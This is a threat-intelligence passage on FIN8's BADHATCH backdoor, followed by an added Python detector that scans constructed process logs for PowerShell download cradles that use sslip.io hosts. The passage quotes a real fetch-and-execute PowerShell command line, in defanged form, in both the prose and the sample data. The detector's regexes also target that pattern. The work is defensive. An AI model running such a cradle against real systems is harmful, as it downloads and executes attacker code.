FIN8 made its debut in 2016 and is known to take long breaks to refine its TTPs. The group has used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. The BADHATCH malware is a mature, highly advanced backdoor that employs several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal PowerShell commands.
The observed command line is "powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73[.]sslip[.]io/yo')". It abuses sslip.io, a service that provides free IP-to-domain mapping to make SSL certificate generation easier (for traffic encryption). While the service is legitimate and widely used, the malware abuses it in an attempt to evade detection.
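As an added, defender-side example that is not part of the original article, the Python script below scans process-creation log lines for the pattern described above: a PowerShell download cradle (-nop, iex, Net.WebClient.DownloadString) fetching over HTTPS from a dashed-IP sslip.io hostname. The log format, host names, user names and the event records are constructed assumptions; the only command line taken from the article is the defanged one quoted above. The script also recovers the IP address behind the hostname, using sslip.io's documented mapping (a-b-c-d.sslip.io resolves to a.b.c.d), so the value can be used for blocking and hunting.

```python
"""Added example (not from the article): flag PowerShell download cradles that hide
their download host behind sslip.io-style wildcard DNS, over process-creation logs."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation records in a hypothetical key=value export format.
# The first cmdline is the defanged one quoted in the article; the others are benign controls.
SAMPLE_EVENTS = [
    'ts=2021-03-10T12:00:01Z host=POS-07 user=svc_pos cmdline="powershell.exe -nop $pa=\'sys\';iex '
    "(New-Object System.Net.WebClient).DownloadString('https://192-129-189-73[.]sslip[.]io/yo')\"",
    'ts=2021-03-10T12:05:22Z host=ADMIN-01 user=jdoe cmdline="powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"',
    'ts=2021-03-10T12:07:40Z host=WS-22 user=asmith cmdline="git pull origin main"',
]

CMDLINE_RE = re.compile(r'cmdline="(.*)"\s*$')
HOST_RE = re.compile(r'\bhost=(\S+)')
USER_RE = re.compile(r'\buser=(\S+)')

# A dot written either live (".") or defanged ("[.]"), so the rule also works on report IoCs.
DOT = r'(?:\.|\[\.\])'
# sslip.io encodes an IPv4 address as a dashed label: a-b-c-d.sslip.io -> a.b.c.d
WILDCARD_DNS_RE = re.compile(r'\b((?:\d{1,3}-){3}\d{1,3})' + DOT + r'sslip' + DOT + r'io\b', re.I)

# Components of the cradle seen in the article's command line.
INDICATORS = {
    "no_profile": re.compile(r'(?<![\w-])-(?:nop|noprofile)\b', re.I),
    "invoke_expression": re.compile(r'\b(?:iex|invoke-expression)\b', re.I),
    "download_cradle": re.compile(r'net\.webclient|downloadstring', re.I),
    "tls_transport": re.compile(r'https://', re.I),
}


@dataclass
class Finding:
    host: str
    user: str
    indicators: List[str]
    c2_ip: Optional[str]  # IP recovered from the dashed sslip.io label, if present
    verdict: str


def decode_sslip_label(label: str) -> str:
    """Turn the dashed label (192-129-189-73) back into a dotted IP for blocking and hunting."""
    return label.replace("-", ".")


def parse_event(line: str) -> dict:
    """Pull host, user and the quoted command line out of one constructed log record."""
    cmd, host, user = CMDLINE_RE.search(line), HOST_RE.search(line), USER_RE.search(line)
    return {
        "host": host.group(1) if host else "?",
        "user": user.group(1) if user else "?",
        "cmdline": cmd.group(1) if cmd else "",
    }


def analyze_command_line(cmdline: str) -> Tuple[List[str], Optional[str]]:
    """Return the cradle indicators present and the IP behind any sslip.io hostname."""
    indicators = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    match = WILDCARD_DNS_RE.search(cmdline)
    return indicators, (decode_sslip_label(match.group(1)) if match else None)


def classify(indicators: List[str], c2_ip: Optional[str]) -> str:
    """A cradle combined with code execution or a wildcard-DNS host is suspicious; wildcard
    DNS on its own only earns a review, because the service has many legitimate users."""
    if "download_cradle" in indicators and ("invoke_expression" in indicators or c2_ip):
        return "suspicious"
    if c2_ip:
        return "review"
    return "benign"


def scan_events(lines: List[str]) -> List[Finding]:
    """Run the rule over log records and keep everything that is not benign."""
    findings = []
    for line in lines:
        event = parse_event(line)
        indicators, c2_ip = analyze_command_line(event["cmdline"])
        verdict = classify(indicators, c2_ip)
        if verdict != "benign":
            findings.append(Finding(event["host"], event["user"], indicators, c2_ip, verdict))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.verdict.upper()} host={f.host} user={f.user} ip={f.c2_ip} "
              f"indicators={','.join(f.indicators)}")
```

Run as a script it reports the POS-07 record as suspicious with the recovered address 192.129.189.73, while the administrator's -NoProfile script invocation stays benign. The verdict logic deliberately keeps a wildcard-DNS hostname alone at "review" rather than "suspicious", matching the article's point that sslip.io itself is a legitimate, widely used service.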